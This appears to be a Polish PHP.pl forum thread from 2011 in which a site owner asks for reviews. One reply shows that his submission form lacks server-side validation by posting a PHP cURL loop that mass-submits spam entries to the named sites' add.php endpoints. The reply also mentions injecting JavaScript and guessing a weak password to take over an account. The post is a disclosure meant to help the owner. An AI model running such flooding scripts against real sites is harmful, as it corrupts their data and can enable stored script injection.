[www] Najlepsza strona - Forum PHP.pl

[www] Najlepsza strona

kujawska Zobacz profil	1.10.2011, 12:25:56 Post #1
Grupa: Zarejestrowani Postów: 116 Pomógł: 2 Dołączył: 19.02.2008 Ostrzeżenie: (50%)	Najlepsza Strona Zdopingowany krytycznymi uwagami o WorstSite.pl przedstawiam do oceny stronę propagującą czystość. Idea i webutility wg. mojej oceny jest trudne do podważenia ale proszę o krytyczne spojrzenie. Najgorszą stronę przerobiłem na przyjazny i znany wszystkim webmasterom obraz. Także proszę o nowe spojrzenie.

Odpowiedzi

ixpack Zobacz profil	7.10.2011, 08:17:53 Post #2
Grupa: Zarejestrowani Postów: 248 Pomógł: 55 Dołączył: 1.06.2010 Skąd: mam to wiedzieć? Ostrzeżenie: (0%)	kujawska - nie jestem hacker, KAŻDY mógłby to zrobić w 5 minut. 1-sza rzecz - ja użyłem wtyczki data tamper - wpisz w wyszukiwaniu wtyczek firefox'a. Jest masa podobnego typu softu. Preparujesz input - dlatego też validacja js nie ma sensu jeżeli chodzi o bezpieczeństwo. Bardzo łatwo zerknąć na to jak nazwałeś input'y. Takie narzędzia służą nie do "hackowania" - ale do ochrony przed tym. Sam tego używam i preparuję input do swoich skryptów. 2-ga prosta pętla na curl: [PHP] pobierz, plaintext $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); $url = 'http://www.validsite.pl/add.php'; $ur = 'url'; $ti = 'title'; $de = 'description'; curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POST, 3); for ($indexo = 0; $indexo < 1000; $indexo++) { for ($index = 0; $index < 1000; $index++) { $requestString = "ur=$ur+$index&ti=$ti+$index&de=$de+$index"; curl_setopt($ch, CURLOPT_POSTFIELDS, "$requestString"); $serverResponse = curl_exec($ch); } } $xurl= "http://www.worstsite.pl/add.php"; curl_setopt($ch, CURLOPT_URL, $xurl); curl_setopt($ch, CURLOPT_POST, 4); for ($indexo = 2; $indexo < 1000; $indexo++) { $requestString = "ur=http%3A%2F%2Fwww.worstsite.pl/?id=".$indexo."&er=9999+&ti=Worst+Site+Ranking&de=Toplista.Ranking+najgorszych+stron+WWW+w+polskim+Internecie+czyli+o+rados nej+twórczości+webmasterów"; curl_setopt($ch, CURLOPT_POSTFIELDS, "$requestString"); $serverResponse = curl_exec($ch); } [PHP] pobierz, plaintext Oczywiście kod jest "na odwal", ale pokazuje gdzie jest problem. KAŻDY może dodać do bazy co zechce... Teoretycznie dodamy skrypt javascript, który coś tam brzydkiego robi... Wystarczy abyś post, który ktoś wprowadza zapisał sobie np. w sesji albo zmiennej, którą dodasz do bazy jeżeli walidator zwróci np. 0 błędóe. Wiele jest rozwiązań - ile ludzi tyle rozwiązań. Na prawdę nie znam się na hackingu. Kiedyś przejąłem konto na khanwars (gra online), ale tylko dlatego, że koleś z top listy miał hasło login123 =] i na głupiego trafiłem... Nie jestem mistrzem zabezpieczeń, ale TU na tym forum jest MASA materiału o bezpieczeństwie, atakach xss etc. Musisz być świadom, że nie ważne jak zabezpieczysz stronę to i tak znajdzie się ktoś, kto to może rozwalić - dlatego backup jest koniecznością. Pozdr. i życzę sukcesu z validsite (worstsite - tam rację bytu tłumaczyłoby jakbyś dodawał strony niebezpieczne dla usera, ale nie po "złości" bo ma kilka błędów html. OK radiomaryja to zło, bo pierze mózgi (IMG:style_emoticons/default/wink.gif) )

Posty w temacie

kujawska [www] Najlepsza strona 1.10.2011, 12:25:56

nmts Na obu serwisach stronkach można podmienić inputy ... 1.10.2011, 12:52:06

drozdii07 To co kolega wyżej mówił. na WorstSite masz: Cyta... 1.10.2011, 13:00:34

qrooel Żal. 1.10.2011, 15:31:38

kujawska Zabawy z bazą.Czy nie lepiej pokazać swoje dokonan... 1.10.2011, 16:43:54

drozdii07 Po pierwsze, o czym ty mówisz, bo nie ogarniam. Po... 1.10.2011, 19:29:19

lukasz91 A jaki sens mają tego typu serwisy to ja nie mam p... 1.10.2011, 19:51:21

kujawska INVALIDdom HTMLowym takim co języka nie znają a st... 1.10.2011, 20:20:41

Michalko Sprawdź w słowniku english - polski co znaczy słów... 1.10.2011, 21:35:48

wookieb Dobra koniec. Nie umiesz przyjąć krytyki i rozmawi... 2.10.2011, 10:24:41

Cysiaczek Otwieram po konsultacji z zainteresowanymi. Ostrze... 6.10.2011, 07:38:45

ixpack Ok... Napiszę Tobie tak: Wyobraź sobie, że Twój se... 6.10.2011, 08:55:11

phpion 1. Wygląd na chama wzięty z walidatora W3C. 2. Log... 6.10.2011, 09:47:55

kamil4u CytatAle Ty jesteś Webmasterem,więc postaraj się n... 6.10.2011, 12:25:25

kujawska Dziękuję ixpack i kamil4u.Będę poprawiał oczywiści... 6.10.2011, 19:39:11

ixpack kujawska - nie jestem hacker, KAŻDY mógłby to zrob... 7.10.2011, 08:17:53

kujawska Poprawiłem bezpieczeństwo bazy. Dodałem [ostatnio ... 15.10.2011, 13:42:00

adbacz Użytkowniku kujawska - Przed przeczytaniem całego ... 22.10.2011, 16:20:07

kujawska adbacz Wygląd strony worstsite.pl i validsite.pl o... 22.10.2011, 17:40:47

Twist Musisz się nauczyć, że poprawny kod html to niewie... 22.10.2011, 18:15:11

kujawska Twist Poprawny kod HTML to 100% poprawności strony... 22.10.2011, 19:16:25

ShadowD Nie wiem czy ktoś zwrócił uwagę, ale tło na większ... 22.10.2011, 19:44:21

kujawska Dziękuję za uwage. Tło jest gradient 1280/1024 pra... 22.10.2011, 20:28:32

Janusz1200 Cytat(kujawska @ 22.10.2011, 20:16:25... 22.10.2011, 21:09:46

Twist kujawska Przedkładanie design,accesibility,usabili... 22.10.2011, 23:32:43

kujawska Twist Ja się na tym nie znam ale przecież edytory ... 23.10.2011, 11:31:29

ShadowD www.screenup.pl/?l=0R95KR2 Więc tak, granica jest ... 23.10.2011, 11:52:46

« Następny starszy · Oceny · Następny nowszy »

1 Użytkowników czyta ten temat (1 Gości i 0 Anonimowych użytkowników)

0 Zarejestrowanych: